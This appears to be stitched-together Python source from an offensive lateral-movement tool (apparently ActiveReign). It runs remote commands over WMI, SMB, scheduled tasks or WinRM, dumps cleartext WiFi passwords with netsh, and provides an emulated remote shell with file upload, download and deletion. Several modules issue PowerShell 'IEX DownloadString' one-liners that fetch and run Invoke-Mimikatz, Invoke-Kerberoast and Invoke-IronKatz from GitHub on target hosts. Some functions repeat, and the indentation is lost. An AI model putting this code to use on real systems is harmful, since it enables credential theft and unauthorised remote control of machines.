def cmd_execution(self, cmd):
self.filer.info("Command Execution\t{}\t{}\\{}\t{}".format(self.host, self.smbcon.ip, self.username, cmd))
if self.exec_method == 'wmiexec':
self.executioner = WMIEXEC(self.logger, self.host, self.args, self.smbcon, share_name=self.sharename)
elif self.exec_method == 'smbexec':
self.executioner = SMBEXEC(self.logger, self.host, self.args, self.smbcon, share_name=self.sharename)
self.output = self.executioner.execute(cmd).splitlines()
def run(self, target, args, smb_con, loggers):
profiles = []
logger = loggers['console']
try:
if args.exec_method == 'wmiexec':
executioner = WMIEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
elif args.exec_method == 'smbexec':
executioner = SMBEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
# Quick n dirty error checking...
results = executioner.execute(
'netsh wlan show profiles').splitlines()
if len(results) <= 1:
logger.fail([
smb_con.host, smb_con.ip,
self.name.upper(), "{}: {}".format(self.name, results[0])
])
return
# List all profiles
for r in results:
if r.strip().startswith('All User Profile'):
try:
wifi = r.strip().split(":")[1]
profiles.append(wifi.lstrip().rstrip())
except:
pass
# Get clear text passwords
for p in profiles:
try:
for result in executioner.execute(
'netsh wlan show profile name=\"{}\" key=clear'.
format(p)).splitlines():
if result.split(":")[0].strip() in [
'SSID name', 'Authentication', 'Cipher',
'Key Content'
]:
logger.success([
smb_con.host, smb_con.ip,
self.name.upper(),
result.lstrip()
])
except Exception as e:
logger.debug([
smb_con.host, smb_con.ip,
self.name.upper(), "{}: {}".format(self.name, str(e))
])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj):
logger = loggers['console']
# Again super lazy way of powershell execution need to redo
try:
if args.exec_method == 'wmiexec':
executioner = WMIEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
elif args.exec_method == 'smbexec':
executioner = SMBEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
for result in executioner.execute(
'powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1\');Invoke-kerberoast -OutputFormat Hashcat"'
).splitlines():
logger.info(
[smb_con.host, smb_con.ip,
self.name.upper(), result])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def code_execution(con, args, target, loggers, config_obj, cmd=None, return_data=False):
# Used as the primary execution function for ps_execute and all modules.
# Get payload to execute
if cmd != None:
payload = cmd
else:
payload = args.execute
# Implement Execution Method
if args.exec_method == 'wmiexec':
executioner = WMIEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
elif args.exec_method == 'smbexec':
executioner = SMBEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
# Log action to file
loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(target, args.domain, args.user, payload))
# Spawn thread for code execution timeout
timer = ExecutionTimeout(executioner, payload)
exe_thread = Thread(target=timer.execute)
exe_thread.start()
exe_thread.join(args.timeout+5)
# CMD Output
if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(con.host, args.user, payload, timer.result)
slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)
# Return to module not print
if return_data:
return timer.result
for line in timer.result.splitlines():
loggers['console'].info([con.host, con.ip, "CODE EXECUTION", line])
def code_execution(con, args, target, loggers, config_obj):
if args.exec_method == 'wmiexec':
executioner = WMIEXEC(loggers['console'],
target,
args,
con,
share_name=args.fileless_sharename)
elif args.exec_method == 'smbexec':
executioner = SMBEXEC(loggers['console'],
target,
args,
con,
share_name=args.fileless_sharename)
loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(
target, args.domain, args.user, args.execute))
timer = ExecutionTimeout(executioner, args.execute)
exe_thread = Thread(target=timer.execute)
exe_thread.start()
exe_thread.join(args.timeout + 3) # Account for sleep timer in exec class
if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(
con.host, args.user, args.execute, timer.result)
slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)
for line in timer.result.splitlines():
loggers['console'].info([con.host, con.ip, "CODE EXECUTION", line])
def run(self, target, args, smb_con, loggers):
logger = loggers['console']
try:
if args.exec_method == 'wmiexec':
executioner = WMIEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
elif args.exec_method == 'smbexec':
executioner = SMBEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
for result in executioner.execute(
'powershell -exec bypass -noni -nop -W hidden -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1\');"'
).splitlines():
logger.info(
[smb_con.host, smb_con.ip,
self.name.upper(), result])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers):
logger = loggers['console']
# Again super lazy way of powershell execution need to redo
try:
if args.exec_method == 'wmiexec':
executioner = WMIEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
elif args.exec_method == 'smbexec':
executioner = SMBEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
for result in executioner.execute(
'powershell -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/m8r0wn/OffensiveDLR/master/Invoke-IronKatz.ps1\');"'
).splitlines():
logger.info(
[smb_con.host, smb_con.ip,
self.name.upper(), result])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def code_execution(con,
args,
target,
loggers,
config_obj,
payload,
return_data=False):
# Implement Execution Method
if args.exec_method.lower() == 'wmiexec':
executioner = WMIEXEC(loggers['console'],
target,
args,
con,
share_name=args.fileless_sharename)
elif args.exec_method.lower() == 'smbexec':
executioner = SMBEXEC(loggers['console'],
target,
args,
con,
share_name=args.fileless_sharename)
elif args.exec_method.lower() == 'atexec':
executioner = TSCHEXEC(loggers['console'],
target,
args,
con,
share_name=args.fileless_sharename)
elif args.exec_method.lower() == 'winrm':
executioner = WINRM(loggers['console'],
target,
args,
con,
share_name=False)
elif args.exec_method.lower() == 'ssh':
executioner = con
# Log action to file
loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(
target, args.domain, args.user, payload))
# Spawn thread for code execution timeout
timer = ExecutionTimeout(executioner, payload)
exe_thread = Thread(target=timer.execute)
exe_thread.start()
exe_thread.join(args.timeout + 5)
exe_thread.running = False
# CMD Output
if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(
con.host, args.user, payload, timer.result)
slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)
# Return to module not print
if return_data:
return timer.result
for line in timer.result.splitlines():
loggers['console'].info(
[con.host, con.ip,
args.exec_method.upper(), line])
class AR3Shell(Connector):
def __init__(self, args, db_obj, loggers):
Connector.__init__(self, args, loggers, args.target)
self.output = []
self.pwd_list = ['C:', 'Windows', 'System32']
self.pwd = '\\'.join(self.pwd_list)
self.exec_method = args.exec_method
self.sharename = args.fileless_sharename
self.db = db_obj
try:
# Setup Smb Connection
self.logger.status('Initiating remote connection')
self.smbcon = SmbCon(self.args, loggers, self.host, self.db)
self.smbcon.create_smb_con()
# Execute command to verify permissions
self.cmd_execution('ECHO %USERDOMAIN%\%USERNAME%')
self.logger.success('Starting emulated shell (Host: {}) (User: {}) (Method: {}) (Fileless: {})'.format(self.host, self.output[0].strip(), self.exec_method, str(args.fileless)))
self.logger.warning("This is a limited shell and requires full paths for file interactions\n")
except Exception as e:
self.logger.fail("Error Starting Shell:".format(str(e)))
exit(1)
def help(self):
print("""
help - show this menu
exit - Close shell
Navigation:
pwd - Show PWD
dir - List PWD
cd - Change directory
File Interactions:
type [remote_file] - Show file contents (Full Path Required)
download [remote_file] [location] - Download remote file (Full Path Required)
upload [local_file] [location] - Upload local file (Full Path Required)
delete [remote_file] - Delete remote file (Full Path Required)
Commands:
[cmd] - Execute remote cmd
""")
def cd(self, cmd):
if cmd.startswith('cd'):
try:
cd_path = cmd.split(' ')[1]
cd_split = cd_path.replace("\\", "/").split("/") # Input formatting
cd_split = [x for x in cd_split if x] # Remove blanks
if cd_path == "/" or cd_path == "\\":
self.pwd_list = ['C:']
# Dir up
elif cd_split[0] == "..":
self.pwd_list.pop(-1)
cd_split.pop(cd_split.index(".."))
# new dir
elif cd_path.startswith(("/", "\\")):
self.pwd_list = ['C:']
self.pwd_list = self.pwd_list + cd_split
except:
self.logger.FAIL('Unable to change directories')
def dir(self, cmd):
if cmd == "dir":
return self.cmd_execution("dir {}".format(self.pwd))
else:
return self.cmd_execution(cmd)
def download(self, cmd):
try:
val = cmd.split(" ")
self.smbcon.downloadFile(val[1], val[2])
self.logger.success("Download Complete: {}".format(val[2]))
except Exception as e:
if str(e) == "list index out of range":
self.logger.fail('Not enough values to unpack, see -h for more')
else:
self.logger.fail("Download Failed: {}".format(str(e)))
def upload(self, cmd):
try:
val = cmd.split(" ")
self.smbcon.uploadFile(val[1], val[2])
self.logger.success("Upload Complete: {}".format(val[2]))
except Exception as e:
if str(e) == "list index out of range":
self.logger.fail('Not enough values to unpack, see -h for more')
else:
self.logger.fail("Upload Failed: {}".format(str(e)))
def delete(self, cmd):
try:
val = cmd.split(" ")
self.smbcon.deleteFile(val[1])
self.logger.success("Download Complete: {}".format(val[1]))
except Exception as e:
if str(e) == "list index out of range":
self.logger.fail('Not enough values to unpack, see -h for more')
else:
self.logger.fail("Deletion Failed: {}".format(str(e)))
def cmd_execution(self, cmd):
self.filer.info("Command Execution\t{}\t{}\\{}\t{}".format(self.host, self.smbcon.ip, self.username, cmd))
if self.exec_method == 'wmiexec':
self.executioner = WMIEXEC(self.logger, self.host, self.args, self.smbcon, share_name=self.sharename)
elif self.exec_method == 'smbexec':
self.executioner = SMBEXEC(self.logger, self.host, self.args, self.smbcon, share_name=self.sharename)
self.output = self.executioner.execute(cmd).splitlines()
def cmdloop(self):
while True:
try:
# init prompt
self.output = []
self.pwd = '\\'.join(self.pwd_list)
cmd = input("{}> ".format(self.pwd))
cmd = cmd.lstrip().rstrip()
self.logger.debug("User cmd ::: \'{}\'".format(cmd))
# Handle CMD input
if cmd == "help":
self.help()
elif cmd == 'exit':
try:
self.smbcon.close()
except:
pass
return True
elif cmd.startswith('cd'):
self.cd(cmd)
elif cmd.startswith('dir'):
self.dir(cmd)
elif cmd.startswith('download'):
self.download(cmd)
elif cmd.startswith('upload'):
self.upload(cmd)
elif cmd.startswith('delete'):
self.delete(cmd)
elif cmd == 'pwd':
self.logger.output(self.pwd)
else:
self.cmd_execution(cmd)
# Show cmd Output
for result in self.output:
self.logger.output(result)
except KeyboardInterrupt:
try:
self.smbcon.close()
except:
pass
return True
except Exception as e:
self.logger.debug(str(e))